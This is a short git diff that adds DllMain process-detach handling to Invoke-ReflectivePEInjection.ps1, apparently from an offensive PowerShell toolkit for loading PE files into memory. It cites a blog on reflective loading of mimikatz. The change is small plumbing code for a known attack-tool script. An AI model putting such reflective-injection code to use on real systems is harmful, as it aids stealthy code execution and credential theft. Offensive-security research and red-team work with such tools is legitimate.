diff options
| -rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection.ps1 | 9 |
1 files changed, 9 insertions, 0 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b582847..a9772e2 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -2620,6 +2620,15 @@ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/ $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_IMPORT_DESCRIPTOR)) } } + + #Call DllMain with process detach + Write-Verbose "Calling dllmain so the DLL knows it is being unloaded" + $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) + $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) + + $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null + $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) |